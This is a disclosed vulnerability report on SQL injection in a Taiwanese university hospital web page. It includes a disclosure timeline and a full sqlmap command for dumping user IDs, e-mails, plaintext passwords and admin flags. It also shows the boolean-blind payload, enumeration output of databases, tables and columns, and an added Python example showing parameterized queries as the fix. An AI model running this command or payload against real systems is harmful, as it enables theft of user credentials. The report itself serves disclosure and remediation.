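2015-10-14: Details reported to the vendor; awaiting vendor action
2015-10-16: Vendor confirmed; details disclosed to the vendor only
2015-10-26: Details disclosed to core white hats and experts in related fields
2015-11-05: Details disclosed to regular white hats
2015-11-15: Details disclosed to trainee white hats
2015-11-30: Details disclosed to the public

SQL injection in a page of National Cheng Kung University Hospital, Taiwan (boolean-based blind / user e-mail addresses and plaintext passwords disclosed)

Tested with sqlmap. Test URL: http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0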
python sqlmap.py -u "http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0" -p Type --technique=B --random-agent -D nckmWeb -T www.UserAccount -C Userid,UserEmail,Userpwd,IsAdmin --dump --threads=10
---
Parameter: Type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Type=11 AND 4724=4724&ContentPage=0
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008

back-end DBMS: Microsoft SQL Server 2008
database management system users [2]:
[*] lsn
[*] sa

back-end DBMS: Microsoft SQL Server 2008
available databases [14]:
[*] Exam100
[*] Exam81
[*] Exam91
[*] HSYS
[*] LISDB_inquiry
[*] master
[*] model
[*] msdb
[*] mv4
[*] nckmWeb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WorkTemp

Database: nckmWeb
[21 tables]
+-----------------------+
| www.Dept              |
| www.FileDownLoads     |
| www.FileDownLoads_old |
| www.FileType          |
| www.GroupAccess       |
| www.News              |
| www.NewsPgAccess      |
| www.News_bk           |
| www.News_old          |
| www.News_tmp          |
| www.PageProfile       |
| www.SiteCounter       |
| www.Speech            |
| www.SystemProfile     |
| www.Ugroup            |
| www.UserAccess        |
| www.UserAccount       |
| www.UserGroup         |
| www.WebLinks          |
| www.WebLinks_old      |
| www.WebLinks_tmp      |
+-----------------------+

Database: nckmWeb
Table: www.UserAccount
[14 columns]
+-------------+
| Column      |
+-------------+
| DeptID      |
| IsAdmin     |
| IsEabled    |
| KeyID       |
| SysDate     |
| SysUserid   |
| UserEmail   |
| Userid      |
| UsernNaC    |
| UsernNaE    |
| UsernNikeNa |
| UserNote    |
| Userpwd     |
| Userpwdhint |
+-------------+

Database: nckmWeb
Table: www.UserAccount
[21 entries]

Add filtering.
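
For a numeric parameter such as Type, the filtering the report asks for is most reliably done by accepting only an integer and binding it as a query parameter. The following is an added example, not part of the original report or the site's code: it uses Python's sqlite3 as a stand-in for the SQL Server back end, and the pages table, its columns and the function names are hypothetical.

```python
import sqlite3

# Constructed stand-in data: sqlite3 replaces the SQL Server back end, and the
# table and column names below are hypothetical, not taken from the report.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (type_id INTEGER, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)",
                   [(11, "Home style"), (12, "Contact")])
    return db

def lookup_concatenated(db, type_param):
    """Vulnerable pattern: the raw query-string value becomes part of the SQL text."""
    sql = "SELECT title FROM pages WHERE type_id = " + type_param
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, type_param):
    """Hardened pattern: accept only digits, then bind the value as a parameter."""
    if not (type_param.isascii() and type_param.isdigit() and len(type_param) <= 9):
        raise ValueError("Type must be a non-negative integer")
    rows = db.execute("SELECT title FROM pages WHERE type_id = ?",
                      (int(type_param),))
    return [row[0] for row in rows]

def has_boolean_oracle(lookup, db):
    """True when a true and a false appended condition change the page content."""
    def render(value):
        try:
            return lookup(db, value)
        except ValueError:
            return "rejected"
    true_case = render("11 AND 4724=4724")   # payload quoted in the report
    false_case = render("11 AND 4724=4725")  # constructed false counterpart
    return true_case != false_case

if __name__ == "__main__":
    db = make_db()
    print("concatenated query leaks a boolean signal:",
          has_boolean_oracle(lookup_concatenated, db))
    print("parameterized query leaks a boolean signal:",
          has_boolean_oracle(lookup_parameterized, db))
```

The has_boolean_oracle check can be kept as a regression test so that a later change reintroducing string concatenation is caught before deployment.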

Severity: High
Vulnerability Rank: 15
Confirmed: 2015-10-16 00:23
Thank you for the report.
None yet.